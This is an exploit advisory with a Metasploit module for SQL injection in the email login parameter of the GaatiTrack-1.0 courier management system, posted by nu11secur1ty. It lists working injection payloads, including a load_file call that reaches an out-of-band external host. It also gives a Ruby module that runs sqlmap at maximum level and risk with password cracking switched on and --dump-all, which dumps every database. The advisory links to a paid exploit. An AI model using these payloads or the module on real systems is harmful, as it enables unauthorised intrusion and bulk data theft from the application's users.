GaatiTrack-1.0 Copyright©2025-Multiple-SQLi - Metasploit module

2025.10.07
Credit: nu11secur1ty
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

# Titles: GaatiTrack-1.0 Copyright©2025-Multiple-SQLi - Metasploit module
# Author: nu11secur1ty
# Date: 10/06/2025
# Vendor: https://www.mayurik.com/
# Software: https://www.sourcecodester.com/php/16848/best-courier-management-system-project-php.html
# Reference: https://portswigger.net/web-security/sql-injection

## Description:
The `email` parameter appears to be vulnerable to SQL injection attacks. The payload `'+(select load_file('\\\\geyz33s0w543jnmhknwp9j5oefk9822qtthl4bs0.oastify.com\\okf'))+'` was submitted in the email parameter. This payload injects a SQL sub-query that calls MySQL's load_file function with a UNC file path that references a URL on an external domain. The application interacted with that domain, indicating that the injected SQL query was executed.

STATUS: HIGH-CRITICAL Vulnerability

[+]Payload:

- SQLi:

```SQLi
---
Parameter: email (POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment)
    Payload: email=cnbkCuPP@burpcollaborator.net'+(select load_file('\\\\geyz33s0w543jnmhknwp9j5oefk9822qtthl4bs0.oastify.com\\okf'))+'' AND 3077=(SELECT (CASE WHEN (3077=3077) THEN 3077 ELSE (SELECT 5162 UNION SELECT 5005) END))-- -&password=r5I!g0t!W9

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: email=cnbkCuPP@burpcollaborator.net'+(select load_file('\\\\geyz33s0w543jnmhknwp9j5oefk9822qtthl4bs0.oastify.com\\okf'))+'' AND (SELECT 5507 FROM(SELECT COUNT(*),CONCAT('qkqqq',(SELECT (ELT(5507=5507,1))),'qxxpq',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- YcNj&password=r5I!g0t!W9

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: email=cnbkCuPP@burpcollaborator.net'+(select load_file('\\\\geyz33s0w543jnmhknwp9j5oefk9822qtthl4bs0.oastify.com\\okf'))+'' AND (SELECT 2855 FROM (SELECT(SLEEP(11)))jpbI)-- jtuB&password=r5I!g0t!W9
---
```

[+]MSF exploit:

```rb
##
# gaati.rb
#
# Author: nu11secur1ty
# Description: gaati-sqli
##
class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(
      'Name'        => 'gaati',
      'Description' => 'gaati-sqli',
      'Author'      => ['nu11secur1ty'],
      'License'     => MSF_LICENSE
    )

    register_options(
      [
        OptString.new('RAW_REQUEST', [ true, 'Raw HTTP request (from Burp)', '' ]),
        OptString.new('SQLMAP_PATH', [ false, 'Full path to sqlmap.py', '/home/kali/sqlmap-nu11secur1ty/sqlmap.py' ])
      ]
    )
  end

  def run
    raw_request = datastore['RAW_REQUEST']
    sqlmap_path = datastore['SQLMAP_PATH'] || '/home/kali/sqlmap-nu11secur1ty/sqlmap.py'

    if raw_request.nil? || raw_request.empty?
      print_error("RAW_REQUEST is empty — will attempt to use system exploit.txt if present.")
    end

    # Prefer system exploit.txt in MSF module dir (no need to cat)
    system_exploit = '/usr/share/metasploit-framework/modules/auxiliary/MSF/exploit.txt'
    use_file = nil

    if File.exist?(system_exploit)
      use_file = system_exploit
      print_good("Using existing exploit file: #{use_file}")
    else
      # fallback: write to user-writable home dir
      exploit_dir = File.join(Dir.home, ".msf_exploits")
      Dir.mkdir(exploit_dir) unless Dir.exist?(exploit_dir)
      timestamp = Time.now.strftime("%Y%m%d%H%M%S")
      tmp_file = File.join(exploit_dir, "exploit_#{timestamp}.txt")

      if raw_request.nil? || raw_request.empty?
        print_error("No RAW_REQUEST provided and no system exploit.txt found — nothing to do.")
        return
      end

      begin
        File.open(tmp_file, "w") { |f| f.write(raw_request) }
        print_good("Saved RAW_REQUEST -> #{tmp_file}")
        use_file = tmp_file
      rescue Errno::EACCES => e
        print_error("Cannot write temp exploit file: #{e}")
        return
      rescue => e
        print_error("Failed to save temp request: #{e}")
        return
      end
    end

    unless File.exist?(sqlmap_path)
      print_error("sqlmap.py not found at #{sqlmap_path}. Set SQLMAP_PATH option to correct path.")
      # do not delete the temp file so user can inspect
      return
    end

    sqlmap_cmd = [
      "python3", sqlmap_path,
      "-r", use_file,
      "--no-cast", "--no-escape",
      "--dbms=mysql",
      "--time-sec=11",
      "--random-agent",
      "--level=5", "--risk=3",
      "--batch",
      "--flush-session",
      "--technique=TBEUSQ",
      "--union-char=UCHAR",
      '--answers="crack=Y,dict=Y,continue=Y,quit=N"',
      "--dump-all"
    ].join(" ")

    print_status("Executing sqlmap: #{sqlmap_cmd}")
    begin
      system(sqlmap_cmd)
      print_good("sqlmap finished (check output above)")
    rescue => e
      print_error("Failed to execute sqlmap: #{e}")
    ensure
      # delete tmp file if we created it
      if use_file != system_exploit
        begin
          File.delete(use_file) if File.exist?(use_file)
          print_status("Deleted temporary file #{use_file}")
        rescue => e
          print_warning("Could not delete temporary file: #{e}")
        end
      end
    end
  end
end
```

# Reproduce:
[href](https://www.patreon.com/posts/gaatitrack-1-0-140566642)

# Buy an exploit only:
[href](https://www.patreon.com/posts/gaatitrack-1-0-140566642)

# Time spent:
01:15:00

--
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/ https://cve.mitre.org/index.html https://cxsecurity.com/ and https://www.exploit-db.com/
home page: https://www.asc3t1c-nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
nu11secur1ty <https://www.asc3t1c-nu11secur1ty.com/>


Copyright 2025, cxsecurity.com